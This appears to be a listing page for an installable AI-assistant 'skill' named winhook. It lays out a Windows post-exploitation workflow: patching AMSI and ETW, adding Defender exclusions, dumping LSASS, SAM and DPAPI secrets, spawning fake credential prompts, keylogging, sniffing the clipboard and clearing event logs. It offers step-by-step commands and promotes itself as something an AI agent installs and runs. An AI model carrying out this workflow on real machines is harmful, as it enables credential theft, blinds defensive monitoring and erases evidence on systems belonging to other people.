メニュー
Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations
Codex または Claude でインストール この Prompt をコピーして Codex、Claude、または他のアシスタントに貼り付けると、Skill ページを確認してインストールできます。
SOC 職業分類に基づく
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools
| name | windows-postexploit |
| description | Windows userland post-exploitation for credential harvesting, monitoring, AMSI/ETW bypass, and stealth operations |
| category | post-exploitation |
| tags | ["windows","post-exploitation","credential-access","defense-evasion","lsass","dpapi","etw","amsi","sam","keylogging"] |
| tech_stack | ["windows","powershell","python","ctypes","win32api"] |
| cwe_ids | ["CWE-269","CWE-522","CWE-693","CWE-312"] |
| chains_with | ["T1003","T1003.001","T1003.002","T1056.001","T1059.001","T1562.001","T1562.006","T1070.001","T1555","T1555.003"] |
| prerequisites | ["T1068","T1548.002"] |
| version | 1.0 |
Windows post-exploitation uses userland APIs (no kernel driver signing needed) for credential harvesting, monitoring, and stealth. After gaining Administrator access on a Windows target, these tools provide comprehensive credential extraction and operational security capabilities.
Before deploying winhook tools, verify:
amsi_bypass and etw_blind first if Defender/EDR is active# Quick prerequisite check
whoami /priv # verify SeDebugPrivilege
Get-MpComputerStatus | Select RealTimeProtectionEnabled # Defender status
Get-Process lsass # verify LSASS accessible
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL # PPL status
Neutralize monitoring before performing credential operations.
| Action | Command | Purpose |
|---|---|---|
| Bypass AMSI | winhook amsi_bypass | Patch AmsiScanBuffer to allow undetected PowerShell execution |
| Blind ETW | winhook etw_blind | Patch EtwEventWrite to prevent EDR from receiving telemetry |
| Exclude paths | winhook defender_exclude --path C:\Tools | Add Defender exclusion for tool staging directory |
Extract credentials from multiple sources.
| Action | Command | Purpose |
|---|---|---|
| LSASS dump | winhook lsass_dump | Dump LSASS memory for NTLM hashes, Kerberos tickets, plaintext passwords |
| SAM extraction | winhook sam_dump | Extract registry hives for offline cracking with secretsdump/hashcat |
| DPAPI secrets | winhook dpapi_extract | Decrypt browser passwords, WiFi keys, Windows Vault credentials |
| Credential phishing | winhook credential_prompt | Spawn fake Windows credential dialog to capture user password |
| Keystroke capture | winhook keylog_win --duration 120 | Log keystrokes with active window context |
| Clipboard monitoring | winhook clipboard_sniff --duration 60 | Capture copied passwords, tokens, and sensitive data |
LSASS dumping uses either comsvcs.dll MiniDump (default, uses a signed Windows DLL) or direct MiniDumpWriteDump from dbghelp.dll. The comsvcs method is preferred as it uses a Microsoft-signed binary.
DPAPI decryption calls CryptUnprotectData from crypt32.dll to decrypt Chrome/Edge Login Data, WiFi passwords, and Windows Credential Vault entries. No additional tools needed — uses the current user's DPAPI master key.
SAM extraction uses reg save to dump SAM, SYSTEM, and SECURITY hives. These can be processed offline with impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL.
Understand the target environment and detect defensive measures.
| Action | Command | Purpose |
|---|---|---|
| Process monitoring | winhook etw_process --duration 60 | Track process creation via ETW — detect security tools, scheduled tasks |
| Network monitoring | winhook etw_network --duration 60 | Track connections via ETW — identify C2 channels, internal services |
Always run cleanup before exiting a target.
winhook cleanup_win
The cleanup tool:
Windows post-exploitation tools are detectable by:
| Program | Technique | MITRE ATT&CK |
|---|---|---|
| lsass_dump | LSASS memory dump via MiniDumpWriteDump | T1003.001 — LSASS Memory |
| sam_dump | Registry hive extraction (SAM/SYSTEM/SECURITY) | T1003.002 — Security Account Manager |
| dpapi_extract | DPAPI secret decryption via CryptUnprotectData | T1555.003 — Credentials from Web Browsers |
| credential_prompt | Fake credential dialog via CredUI | T1056.002 — GUI Input Capture |
| keylog_win | Keystroke capture via SetWindowsHookEx | T1056.001 — Keylogging |
| etw_process | Process monitoring via ETW provider | T1057 — Process Discovery |
| etw_network | Network monitoring via ETW provider | T1049 — System Network Connections Discovery |
| clipboard_sniff | Clipboard monitoring via Win32 API | T1115 — Clipboard Data |
| amsi_bypass | AMSI patching in memory | T1562.001 — Disable or Modify Tools |
| etw_blind | ETW patching to blind EDR | T1562.006 — Indicator Blocking |
| defender_exclude | Windows Defender exclusion management | T1562.001 — Disable or Modify Tools |
| cleanup_win | Event log clearing and artifact removal | T1070.001 — Clear Windows Event Logs |